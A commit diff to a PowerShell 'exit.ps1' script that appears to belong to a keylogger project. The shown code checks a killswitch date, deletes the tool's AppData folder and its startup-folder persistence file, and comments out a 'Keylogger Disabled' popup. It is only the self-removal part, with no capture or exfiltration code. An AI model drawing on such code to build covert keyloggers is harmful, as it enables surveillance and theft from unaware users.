Update exit.ps1
This commit is contained in:
parent
f89a037352
commit
fed4a745fc
1 changed files with 1 additions and 1 deletions
|
@ -10,7 +10,7 @@ if(((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rc
|
|||
sleep 10
|
||||
Remove-Item "$env:appdata\-locker" -Recurse -Force;
|
||||
Remove-Item "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"
|
||||
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Keylogger Disabled",3)
|
||||
#$done = New-Object -ComObject Wscript.Shell;$done.Popup("Keylogger Disabled",3)
|
||||
Remove-Item "$env:appdata\-exit.ps1"
|
||||
}
|
||||
else{continue}
|
||||
|
|
Loading…
Reference in a new issue